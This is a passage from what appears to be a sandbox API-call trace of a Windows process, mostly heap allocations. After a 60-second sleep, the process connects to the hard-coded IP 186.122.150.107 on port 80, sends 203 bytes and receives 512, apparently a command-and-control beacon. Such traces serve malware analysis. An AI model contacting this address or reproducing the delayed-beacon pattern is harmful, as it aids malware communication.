Size=0x200) returned 0x29131e8 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2915268 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2911fa0 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950380 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2951730 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950f50 [0271.403] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x294f9a8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2952108 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950578 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2951d18 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x294fd98 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950968 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2952ed0 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2951b20 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x294fba0 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950b60 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2951f10 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2950d58 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2951148 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285ae38 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285b020 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285bf60 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285c518 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2859570 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285b3f0 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285c330 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285a880 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285c700 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285aa68 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x285c8e8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2858fb8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2859758 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x28591a0 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2859940 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2859ef8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2919588 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291a098 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291aba8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291bff0 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291ba68 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291b308 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2919ce8 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291af58 [0271.404] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2919938 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2919760 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291b890 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291b130 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2920078 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291faf0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291e6a8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x291f918 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289c4d0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289c698 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2899da0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289abe0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289ada8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2899848 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289b858 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28994b8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289af70 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289a2f8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289bf78 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289a688 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289b138 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2899680 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289b690 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289bbe8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c768 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c240 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292a878 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c088 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292a198 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292bb60 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2929590 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2929e28 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c920 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292b110 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c3f8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292cad8 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292c5b0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2929fe0 [0271.405] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292a350 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292aa30 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec940 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ece38 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ed330 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec2a0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec798 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec448 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec0f8 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ebf50 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ecfe0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ec5f0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28ed188 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e6930 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e8208 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e7b68 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e5d98 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x28e58a0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29746a0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29736b0 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2975b58 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2974370 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2974b68 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2973518 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2973ea8 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2973848 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2974508 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29761b8 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2974d00 [0271.406] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2976350 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29741d8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2973380 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2974838 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29759c0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293ae10 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2939718 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2939a28 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293bbd8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293c508 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293b120 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293b2a8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2939590 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2939bb0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2939d38 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293ac88 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293a1d0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293b430 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293a4e0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293ba50 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293bee8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29666d0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2967118 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2966cb0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2965998 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29653b8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2967408 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2967290 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2965b10 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2966848 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29669c0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2966e28 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2965530 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2966fa0 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2965e00 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2966558 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29656a8 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28ac260 [0271.407] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28af7d0 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28afc08 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28b0040 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aeb28 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28af938 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28b0b80 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28af668 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aec90 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28af398 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28afd70 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28af0c8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28b0310 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aedf8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28b0ce8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x28aef60 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f0308 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f21f0 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f1de8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f0f20 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f2348 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f24a0 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f0c70 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f28a8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f1078 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f0868 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f1328 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f1b38 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f11d0 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f15d8 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f0460 [0271.408] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f09c0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b7b90 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b7e20 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b7f68 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b81f8 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b8488 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b85d0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b8718 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b8ec8 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b8c38 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b8d80 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b2700 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b13c8 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b2848 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b2eb0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b1280 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x28b1cc0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2946af0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2946d60 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947d38 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2948218 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947108 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947378 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x29474b0 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947e70 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2946880 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947858 [0271.409] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2947fa8 [0271.415] Sleep (dwMilliseconds=0xea60) [0281.425] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0281.425] socket (af=2, type=1, protocol=6) returned 0x2bc [0281.427] htons (hostshort=0x50) returned 0x5000 [0281.427] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0281.427] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0281.428] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0281.428] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0281.428] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0281.428] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0281.687] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0281.687] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0281.954] closesocket (s=0x2bc) returned 0 [0281.954] WSACleanup () returned 0 [0281.954] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28de670 [0281.954] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dbb50 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dbd78 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dc618 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dd0e0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dd530 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28df138 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dbfa0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dd758 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dc1c8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28db928 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dae60 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dc3f0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x28dd980 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28db088 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28ddba8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28de898 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28de448 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28deac0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28db2b0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28db4d8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28df7b0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28e2948 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28e08f0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28e13b8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28df588 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28dfe28 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28df9d8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28e0b18 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x28e31e8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29174f0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2918f58 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29168c0 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2915880 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29166b8 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2919160 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2918940 [0281.955] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2917900 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2917b08 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2918530 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29172e8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2915e98 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2917d10 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2915a88 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29160a0 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x29162a8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2955828 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2954670 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2955a20 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2954a60 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 